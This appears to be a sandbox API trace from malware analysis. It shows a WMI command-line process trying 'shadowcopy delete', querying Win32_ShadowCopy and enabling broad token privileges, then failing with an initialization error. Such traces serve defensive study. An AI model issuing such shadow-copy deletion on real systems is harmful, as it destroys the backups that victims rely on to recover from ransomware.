	[0258.098] malloc (_Size=0x30) returned 0x779c38
	[0258.098] lstrlenW (lpString="Shadow copy management.") returned 23
	[0258.099] free (_Block=0x7789b0) 
	[0258.099] IUnknown:Release (This=0x499e50) returned 0x0
	[0258.099] free (_Block=0x7789c8) 
	[0258.099] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0258.099] lstrlenW (lpString="PATH") returned 4
	[0258.099] lstrlenW (lpString="delete") returned 6
	[0258.099] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1
	[0258.099] lstrlenW (lpString="WHERE") returned 5
	[0258.099] lstrlenW (lpString="delete") returned 6
	[0258.099] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1
	[0258.100] lstrlenW (lpString="(") returned 1
	[0258.100] lstrlenW (lpString="delete") returned 6
	[0258.100] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3
	[0258.100] lstrlenW (lpString="/") returned 1
	[0258.100] lstrlenW (lpString="delete") returned 6
	[0258.100] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3
	[0258.100] lstrlenW (lpString="-") returned 1
	[0258.100] lstrlenW (lpString="delete") returned 6
	[0258.100] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3
	[0258.100] malloc (_Size=0xc) returned 0x7789c8
	[0258.101] lstrlenW (lpString="GET") returned 3
	[0258.101] lstrlenW (lpString="delete") returned 6
	[0258.101] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1
	[0258.101] lstrlenW (lpString="LIST") returned 4
	[0258.101] lstrlenW (lpString="delete") returned 6
	[0258.101] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1
	[0258.101] lstrlenW (lpString="SET") returned 3
	[0258.101] lstrlenW (lpString="delete") returned 6
	[0258.101] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1
	[0258.102] lstrlenW (lpString="CREATE") returned 6
	[0258.102] lstrlenW (lpString="delete") returned 6
	[0258.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3
	[0258.102] lstrlenW (lpString="CALL") returned 4
	[0258.102] lstrlenW (lpString="delete") returned 6
	[0258.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3
	[0258.102] lstrlenW (lpString="ASSOC") returned 5
	[0258.102] lstrlenW (lpString="delete") returned 6
	[0258.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0258.102] lstrlenW (lpString="DELETE") returned 6
	[0258.102] lstrlenW (lpString="delete") returned 6
	[0258.102] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2
	[0258.103] free (_Block=0x7789c8) 
	[0258.103] lstrlenW (lpString="/") returned 1
	[0258.103] lstrlenW (lpString="delete") returned 6
	[0258.103] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3
	[0258.103] lstrlenW (lpString="-") returned 1
	[0258.103] lstrlenW (lpString="delete") returned 6
	[0258.103] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3
	[0258.103] lstrlenW (lpString="delete") returned 6
	[0258.103] malloc (_Size=0xe) returned 0x7789e0
	[0258.103] lstrlenW (lpString="delete") returned 6
	[0258.104] lstrlenW (lpString="GET") returned 3
	[0258.104] lstrlenW (lpString="delete") returned 6
	[0258.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1
	[0258.104] lstrlenW (lpString="LIST") returned 4
	[0258.104] lstrlenW (lpString="delete") returned 6
	[0258.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1
	[0258.104] lstrlenW (lpString="SET") returned 3
	[0258.104] lstrlenW (lpString="delete") returned 6
	[0258.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1
	[0258.104] lstrlenW (lpString="CREATE") returned 6
	[0258.104] lstrlenW (lpString="delete") returned 6
	[0258.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3
	[0258.104] lstrlenW (lpString="CALL") returned 4
	[0258.104] lstrlenW (lpString="delete") returned 6
	[0258.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3
	[0258.105] lstrlenW (lpString="ASSOC") returned 5
	[0258.105] lstrlenW (lpString="delete") returned 6
	[0258.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0258.105] lstrlenW (lpString="DELETE") returned 6
	[0258.105] lstrlenW (lpString="delete") returned 6
	[0258.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2
	[0258.105] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0258.105] malloc (_Size=0x3e) returned 0x779c70
	[0258.106] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0258.106] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x1619aee8 | out: _String="Select", _Context=0x1619aee8) returned="Select"
	[0258.106] malloc (_Size=0xc) returned 0x7789c8
	[0258.106] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1619aee8 | out: _String=0x0, _Context=0x1619aee8) returned="*"
	[0258.106] lstrlenW (lpString="FROM") returned 4
	[0258.106] lstrlenW (lpString="*") returned 1
	[0258.106] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
	[0258.106] malloc (_Size=0xc) returned 0x7789f8
	[0258.106] free (_Block=0x7789c8) 
	[0258.107] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1619aee8 | out: _String=0x0, _Context=0x1619aee8) returned="from"
	[0258.107] lstrlenW (lpString="FROM") returned 4
	[0258.107] lstrlenW (lpString="from") returned 4
	[0258.107] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
	[0258.107] malloc (_Size=0xc) returned 0x778a10
	[0258.107] free (_Block=0x7789f8) 
	[0258.107] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1619aee8 | out: _String=0x0, _Context=0x1619aee8) returned="Win32_ShadowCopy"
	[0258.107] malloc (_Size=0xc) returned 0x778a58
	[0258.107] free (_Block=0x778a10) 
	[0258.108] free (_Block=0x779c70) 
	[0258.108] free (_Block=0x778a58) 
	[0258.108] lstrlenW (lpString="SET") returned 3
	[0258.108] lstrlenW (lpString="delete") returned 6
	[0258.108] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1
	[0258.108] lstrlenW (lpString="CREATE") returned 6
	[0258.108] lstrlenW (lpString="delete") returned 6
	[0258.108] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3
	[0258.108] free (_Block=0x778b90) 
	[0258.109] malloc (_Size=0x4) returned 0x778b90
	[0258.109] lstrlenW (lpString="GET") returned 3
	[0258.109] lstrlenW (lpString="delete") returned 6
	[0258.109] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1
	[0258.109] lstrlenW (lpString="LIST") returned 4
	[0258.109] lstrlenW (lpString="delete") returned 6
	[0258.109] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1
	[0258.109] lstrlenW (lpString="ASSOC") returned 5
	[0258.109] lstrlenW (lpString="delete") returned 6
	[0258.109] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0258.109] WbemLocator:IUnknown:AddRef (This=0x462a00) returned 0x3
	[0258.110] free (_Block=0x771208) 
	[0258.110] lstrlenW (lpString="") returned 0
	[0258.110] lstrlenW (lpString="XC64ZB") returned 6
	[0258.110] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XC64ZB", cchCount1=6, lpString2="", cchCount2=0) returned 3
	[0258.110] lstrlenW (lpString="XC64ZB") returned 6
	[0258.110] malloc (_Size=0xe) returned 0x7789b0
	[0258.110] lstrlenW (lpString="XC64ZB") returned 6
	[0258.110] GetCurrentThreadId () returned 0xfd4
	[0258.110] GetCurrentProcess () returned 0xffffffff
	[0258.110] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xcf650 | out: TokenHandle=0xcf650*=0x2bc) returned 1
	[0258.110] GetTokenInformation (in: TokenHandle=0x2bc, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcf64c | out: TokenInformation=0x0, ReturnLength=0xcf64c) returned 0
	[0258.110] malloc (_Size=0x118) returned 0x779c70
	[0258.110] GetTokenInformation (in: TokenHandle=0x2bc, TokenInformationClass=0x3, TokenInformation=0x779c70, TokenInformationLength=0x118, ReturnLength=0xcf64c | out: TokenInformation=0x779c70, ReturnLength=0xcf64c) returned 1
	[0258.111] AdjustTokenPrivileges (in: TokenHandle=0x2bc, DisableAllPrivileges=0, NewState=0x779c70*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0258.111] free (_Block=0x779c70) 
	[0258.111] CloseHandle (hObject=0x2bc) returned 1
	[0258.111] lstrlenW (lpString="GET") returned 3
	[0258.111] lstrlenW (lpString="delete") returned 6
	[0258.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1
	[0258.112] lstrlenW (lpString="LIST") returned 4
	[0258.112] lstrlenW (lpString="delete") returned 6
	[0258.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1
	[0258.112] lstrlenW (lpString="SET") returned 3
	[0258.112] lstrlenW (lpString="delete") returned 6
	[0258.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1
	[0258.112] lstrlenW (lpString="CALL") returned 4
	[0258.112] lstrlenW (lpString="delete") returned 6
	[0258.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3
	[0258.112] lstrlenW (lpString="ASSOC") returned 5
	[0258.112] lstrlenW (lpString="delete") returned 6
	[0258.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0258.113] lstrlenW (lpString="CREATE") returned 6
	[0258.113] lstrlenW (lpString="delete") returned 6
	[0258.113] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3
	[0258.113] lstrlenW (lpString="DELETE") returned 6
	[0258.113] lstrlenW (lpString="delete") returned 6
	[0258.113] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2
	[0258.113] malloc (_Size=0xc) returned 0x778a40
	[0258.113] lstrlenA (lpString="") returned 0
	[0258.113] malloc (_Size=0x2) returned 0x771208
	[0258.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1012b44, cbMultiByte=-1, lpWideCharStr=0x771208, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0258.114] free (_Block=0x771208) 
	[0258.114] malloc (_Size=0xc) returned 0x778a10
	[0258.114] lstrlenA (lpString="") returned 0
	[0258.114] malloc (_Size=0x2) returned 0x771208
	[0258.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1012b44, cbMultiByte=-1, lpWideCharStr=0x771208, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0258.114] free (_Block=0x771208) 
	[0258.114] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0258.114] malloc (_Size=0x3e) returned 0x779c70
	[0258.114] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0258.114] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x1619aeb0 | out: _String="Select", _Context=0x1619aeb0) returned="Select"
	[0258.114] malloc (_Size=0xc) returned 0x778a58
	[0258.115] free (_Block=0x778a10) 
	[0258.115] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1619aeb0 | out: _String=0x0, _Context=0x1619aeb0) returned="*"
	[0258.115] lstrlenW (lpString="FROM") returned 4
	[0258.115] lstrlenW (lpString="*") returned 1
	[0258.115] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
	[0258.115] malloc (_Size=0xc) returned 0x778a10
	[0258.115] free (_Block=0x778a58) 
	[0258.115] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1619aeb0 | out: _String=0x0, _Context=0x1619aeb0) returned="from"
	[0258.115] lstrlenW (lpString="FROM") returned 4
	[0258.115] lstrlenW (lpString="from") returned 4
	[0258.115] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
	[0258.115] malloc (_Size=0xc) returned 0x778a58
	[0258.116] free (_Block=0x778a10) 
	[0258.116] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1619aeb0 | out: _String=0x0, _Context=0x1619aeb0) returned="Win32_ShadowCopy"
	[0258.116] malloc (_Size=0xc) returned 0x778998
	[0258.116] free (_Block=0x778a58) 
	[0258.116] free (_Block=0x779c70) 
	[0258.117] malloc (_Size=0xc) returned 0x778a58
	[0258.117] malloc (_Size=0xc) returned 0x7789f8
	[0258.117] SysStringLen (param_1="SELECT * FROM ") returned 0xe
	[0258.117] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10
	[0258.117] memcpy (in: _Dst=0x4bda1c, _Src=0x4921ac, _Size=0x1e | out: _Dst=0x4bda1c) returned 0x4bda1c
	[0258.117] memcpy (in: _Dst=0x4bda38, _Src=0x47957c, _Size=0x22 | out: _Dst=0x4bda38) returned 0x4bda38
	[0258.117] free (_Block=0x778a40) 
	[0258.117] free (_Block=0x778a58) 
	[0258.117] ??0CHString@@QAE@XZ () returned 0xcf5f0
	[0258.118] GetCurrentThreadId () returned 0xfd4
	[0258.118] malloc (_Size=0xc) returned 0x7789c8
	[0258.118] malloc (_Size=0xc) returned 0x778a10
	[0258.118] malloc (_Size=0xc) returned 0x778a40
	[0258.118] malloc (_Size=0xc) returned 0x778a58
	[0258.118] malloc (_Size=0xc) returned 0x778938
	[0258.118] SysStringLen (param_1="\\\\") returned 0x2
	[0258.118] SysStringLen (param_1="XC64ZB") returned 0x6
	[0258.119] memcpy (in: _Dst=0x4a496c, _Src=0x4a473c, _Size=0x6 | out: _Dst=0x4a496c) returned 0x4a496c
	[0258.119] memcpy (in: _Dst=0x4a4970, _Src=0x4a4b9c, _Size=0xe | out: _Dst=0x4a4970) returned 0x4a4970
	[0258.119] malloc (_Size=0xc) returned 0x7786c8
	[0258.119] SysStringLen (param_1="\\\\XC64ZB") returned 0x8
	[0258.119] SysStringLen (param_1="\\") returned 0x1
	[0258.119] memcpy (in: _Dst=0x4a4994, _Src=0x4a496c, _Size=0x12 | out: _Dst=0x4a4994) returned 0x4a4994
	[0258.119] memcpy (in: _Dst=0x4a49a4, _Src=0x4a4944, _Size=0x4 | out: _Dst=0x4a49a4) returned 0x4a49a4
	[0258.119] malloc (_Size=0xc) returned 0x7786e0
	[0258.119] SysStringLen (param_1="\\\\XC64ZB\\") returned 0x9
	[0258.119] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa
	[0258.120] memcpy (in: _Dst=0x4921ac, _Src=0x4a4994, _Size=0x14 | out: _Dst=0x4921ac) returned 0x4921ac
	[0258.120] memcpy (in: _Dst=0x4921be, _Src=0x4a4714, _Size=0x16 | out: _Dst=0x4921be) returned 0x4921be
	[0258.120] free (_Block=0x7786c8) 
	[0258.120] free (_Block=0x778938) 
	[0258.120] free (_Block=0x778a58) 
	[0258.120] free (_Block=0x778a40) 
	[0258.120] free (_Block=0x778a10) 
	[0258.121] free (_Block=0x7789c8) 
	[0258.121] malloc (_Size=0xc) returned 0x778a40
	[0258.121] malloc (_Size=0xc) returned 0x7789c8
	[0258.122] malloc (_Size=0xc) returned 0x778a10
	[0258.122] WbemLocator:IWbemLocator:ConnectServer (in: This=0x462a00, strNetworkResource="\\\\XC64ZB\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1059564 | out: ppNamespace=0x1059564*=0x495858) returned 0x0
	[0259.161] free (_Block=0x778a10) 
	[0259.161] free (_Block=0x7789c8) 
	[0259.162] free (_Block=0x778a40) 
	[0259.162] CoSetProxyBlanket (pProxy=0x495858, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0259.162] free (_Block=0x7786e0) 
	[0259.162] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0259.162] ??0CHString@@QAE@XZ () returned 0xcf5e0
	[0259.162] GetCurrentThreadId () returned 0xfd4
	[0259.162] malloc (_Size=0xc) returned 0x7786c8
	[0259.162] lstrlenA (lpString="") returned 0
	[0259.163] malloc (_Size=0x2) returned 0x771208
	[0259.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1012b44, cbMultiByte=-1, lpWideCharStr=0x771208, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0259.163] free (_Block=0x771208) 
	[0259.163] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e
	[0259.163] SysStringLen (param_1="") returned 0x0
	[0259.163] free (_Block=0x7786c8) 
	[0259.163] malloc (_Size=0xc) returned 0x7786c8
	[0259.163] IWbemServices:ExecQuery (in: This=0x495858, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0xcf5d8 | out: ppEnum=0xcf5d8*=0x0) returned 0x80041014
	[0282.119] free (_Block=0x7786c8) 
	[0282.119] _CxxThrowException () 
	[0282.124] malloc (_Size=0x10) returned 0x778938
	[0282.124] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0282.124] free (_Block=0x778998) 
	[0282.124] free (_Block=0x7789f8) 
	[0282.125] GetCurrentThreadId () returned 0xfd4
	[0282.125] ??0CHString@@QAE@PBG@Z () returned 0xcf680
	[0282.125] ??YCHString@@QAEABV0@PBG@Z () returned 0xcf680
	[0282.126] ??0CHString@@QAE@XZ () returned 0xcf54c
	[0282.126] malloc (_Size=0xc) returned 0x7789c8
	[0282.126] malloc (_Size=0xc) returned 0x7789f8
	[0282.126] SysStringLen (param_1="") returned 0x0
	[0282.127] memcpy (in: _Dst=0x4a4994, _Src=0x4a496c, _Size=0x2 | out: _Dst=0x4a4994) returned 0x4a4994
	[0282.127] free (_Block=0x7789c8) 
	[0282.127] CoCreateInstance (in: rclsid=0x10169bc*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x10169cc*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x105957c | out: ppv=0x105957c*=0x49add0) returned 0x0
	[0282.145] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x49add0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0xcf550 | out: MessageText=0xcf550*="Initialization failure\r\n") returned 0x0
	[0282.151] free (_Block=0x7789f8) 
	[0282.152] malloc (_Size=0xc) returned 0x778a40
	[0282.362] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x49add0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0xcf554 | out: MessageText=0xcf554*="WMI") returned 0x0
	[0282.362] malloc (_Size=0xc) returned 0x778a58
	[0282.362] lstrlenW (lpString="WMI") returned 3
	[0282.363] lstrlenW (lpString="Wbem") returned 4
	[0282.363] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1
	[0282.363] lstrlenW (lpString="WMI") returned 3
	[0282.363] lstrlenW (lpString="WMI") returned 3
	[0282.363] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2
	[0282.363] WbemStatusCodeText:IUnknown:Release (This=0x49add0) returned 0x0
	[0282.363] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0282.363] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0xcedac, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18
	[0282.364] FormatMessageW (in: dwFlags=0x2500, lpSource=0xcedac, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0xced94, nSize=0x0, Arguments=0xced98 | out: lpBuffer="惠G블J") returned 0x2e
	[0282.364] malloc (_Size=0xc) returned 0x778998
	[0282.365] LocalFree (hMem=0x4760e0) returned 0x0
	[0282.365] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47
	[0282.365] malloc (_Size=0x2f) returned 0x779ce8
	[0282.365] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x779ce8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47
	[0282.365] __iob_func () returned 0x768d1208
	[0282.365] fprintf (in: _File=0x768d1248, _Format="%s" | out: _File=0x768d1248) returned 46
	[0283.266] __iob_func () returned 0x768d1208
	[0283.266] fflush (in: _File=0x768d1248 | out: _File=0x768d1248) returned 0
	[0283.267] free (_Block=0x779ce8) 
	[0283.267] free (_Block=0x778998) 
	[0283.267] free (_Block=0x778a58) 
	[0283.267] free (_Block=0x778a40) 
	[0283.268] ??1CHString@@QAE@XZ () returned 0x1
	[0283.268] ??0CHString@@QAE@PBG@Z () returned 0xcf688
	[0283.268] ??YCHString@@QAEABV0@PBG@Z () returned 0xcf688
	[0283.268] GetCurrentThreadId () returned 0xfd4
	[0283.268] ??1CHString@@QAE@XZ () returned 0x1
	[0283.268] WbemLocator:IUnknown:Release (This=0x495858) returned 0x0
	[0283.273] ?Empty@CHString@@QAEXXZ () returned 0x6f886260
	[0283.274] free (_Block=0x778938) 
	[0283.274] _kbhit () returned 0x0
	[0284.237] free (_Block=0x778b90) 
	[0284.237] free (_Block=0x7788d8) 
	[0284.238] free (_Block=0x778920) 
	[0284.238] free (_Block=0x7788c0) 
	[0284.238] free (_Block=0x7788a8) 
	[0284.239] free (_Block=0x778b30) 
	[0284.239] free (_Block=0x7724d8) 
	[0284.239] free (_Block=0x779c38) 
	[0284.239] free (_Block=0x7789e0) 
	[0284.240] free (_Block=0x779bb8) 
	[0284.240] free (_Block=0x778a28) 
	[0284.240] free (_Block=0x772578) 
	[0284.240] free (_Block=0x779c28) 
	[0284.240] free (_Block=0x770508) 
	[0284.240] free (_Block=0x779c00) 
	[0284.241] ?Empty@CHString@@QAEXXZ () returned 0x6f886260
	[0284.241] free (_Block=0x778b60) 
	[0284.241] free (_Block=0x7724f8) 
	[0284.241] free (_Block=0x7788f0) 
	[0284.242] free (_Block=0x773be8) 
	[0284.242] free (_Block=0x773c30) 
	[0284.242] free (_Block=0x773c78) 
	[0284.243] free (_Block=0x7789b0) 
	[0284.243] free (_Block=0x773d20) 
	[0284.243] free (_Block=0x7704f0) 
	[0284.243] free (_Block=0x772618) 
	[0284.243] free (_Block=0x7704d8) 
	[0284.243] free (_Block=0x772378) 
	[0284.243] free (_Block=0x7704a0) 
	[0284.244] free (_Block=0x7704b8) 
	[0284.244] free (_Block=0x773ee8) 
	[0284.244] free (_Block=0x773f00) 
	[0284.244] free (_Block=0x773eb0) 
	[0284.244] free (_Block=0x773ec8) 
	[0284.244] free (_Block=0x773f20) 
	[0284.244] free (_Block=0x773f38) 
	[0284.244] free (_Block=0x773f58) 
	[0284.244] free (_Block=0x773f70) 
	[0284.245] free (_Block=0x773e40) 
	[0284.245] free (_Block=0x773e58) 
	[0284.245] free (_Block=0x773e08) 
	[0284.245] free (_Block=0x773e20) 
	[0284.245] free (_Block=0x773e78) 
	[0284.245] free (_Block=0x773e90) 
	[0284.247] free (_Block=0x773d48) 
	[0284.247] free (_Block=0x773de8) 
	[0284.247] free (_Block=0x773ce8) 
	[0284.247] free (_Block=0x773cc0) 
	[0284.248] free (_Block=0x778aa8) 
	[0284.248] WbemLocator:IUnknown:Release (This=0x462a00) returned 0x2
	[0284.248] WbemLocator:IUnknown:Release (This=0x4954e8) returned 0x0
	[0284.254] WbemLocator:IUnknown:Release (This=0x4951c8) returned 0x0
	[0284.258] WbemLocator:IUnknown:Release (This=0x462a00) returned 0x1
	[0284.258] ?Empty@CHString@@QAEXXZ () returned 0x6f886260
	[0284.258] WbemLocator:IUnknown:Release (This=0x462a00) returned 0x0
	[0284.258] free (_Block=0x778860) 
	[0284.258] free (_Block=0x778878) 
	[0284.259] free (_Block=0x772538) 
	[0284.259] free (_Block=0x778890) 
	[0284.259] free (_Block=0x778740) 
	[0284.259] free (_Block=0x772438) 
	[0284.259] free (_Block=0x7787a0) 
	[0284.259] free (_Block=0x7787b8) 
	[0284.259] free (_Block=0x7723d8) 
	[0284.259] free (_Block=0x778950) 
	[0284.260] free (_Block=0x7787e8) 
	[0284.260] free (_Block=0x7725f8) 
	[0284.260] free (_Block=0x778770) 
	[0284.260] free (_Block=0x778710) 
	[0284.260] free (_Block=0x7723f8) 
	[0284.260] free (_Block=0x778758) 
	[0284.260] free (_Block=0x7787d0) 
	[0284.260] free (_Block=0x772638) 
	[0284.261] free (_Block=0x778848) 
	[0284.261] free (_Block=0x778968) 
